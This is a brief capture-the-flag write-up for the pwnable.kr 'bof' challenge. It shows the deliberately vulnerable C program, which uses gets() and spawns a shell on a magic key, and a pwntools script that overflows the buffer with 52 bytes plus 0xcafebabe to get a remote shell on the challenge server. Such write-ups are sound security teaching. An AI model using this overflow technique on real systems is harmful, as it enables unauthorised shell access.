bof
作者:互联网
Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?
Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c
Running at : nc pwnable.kr 9000
程序源码如下:
#include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; }
缓冲区溢出漏洞,该程序是32位elf
因此构造payload覆盖栈上的key即可
payload如下(受网络问题可能需要多次尝试):
from pwn import * #io = process('./bof') #io = gdb.debug('./bof', 'b main') io = remote('pwnable.kr', 9000) context.log_level = 'debug' payload = b'a' * 52 + p32(0xcafebabe) #io.recvuntil('overflow me : ') io.sendline(payload) #io.sendline() io.interactive()
标签:me,pwnable,kr,io,payload,bof 来源: https://www.cnblogs.com/hktk1643/p/15088480.html